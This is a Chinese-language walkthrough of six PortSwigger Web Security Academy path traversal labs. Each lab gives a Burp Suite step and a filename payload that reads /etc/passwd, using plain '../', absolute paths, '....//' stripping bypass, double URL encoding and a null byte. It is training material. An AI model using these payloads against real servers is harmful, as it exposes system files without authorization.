简单案例
lab
实验室:文件路径遍历,简单案例 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改获取产品图片的请求。
修改参数,为其指定值:
filename../../../etc/passwd- 请注意,响应是否包含文件的内容。
/etc/passwd
使用绝对路径旁路阻止的遍历序列
lab
实验室:文件路径遍历,使用绝对路径旁路阻止的遍历序列 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改获取产品图片的请求。
- 修改参数,为其指定值 。
filename`/etc/passwd` - 请注意,响应是否包含文件的内容。
/etc/passwd
遍历序列以非递归方式剥离
lab
实验室:文件路径遍历,非递归剥离遍历序列 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改获取产品图片的请求。
修改参数,为其指定值:
filename....//....//....//etc/passwd- 请注意,响应是否包含文件的内容。
/etc/passwd
使用多余的 URL 解码剥离的遍历序列
lab
实验室:文件路径遍历,使用多余的 URL 解码剥离的遍历序列 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改获取产品图片的请求。
修改参数,为其指定值:
filename..%252f..%252f..%252fetc/passwd- 请注意,响应是否包含文件的内容。
/etc/passwd
验证路径的起点
lab
实验室:文件路径遍历,验证路径起点 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改获取产品图片的请求。
修改参数,为其指定值:
filename/var/www/images/../../../etc/passwd- 请注意,响应是否包含文件的内容。
/etc/passwd
使用空字节绕过验证文件扩展名
lab
实验室:文件路径遍历,使用空字节绕过验证文件扩展名 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改获取产品图片的请求。
修改参数,为其指定值:
filename../../../etc/passwd%00.png- 请注意,响应是否包含文件的内容。
/etc/passwd
评论0
暂时没有评论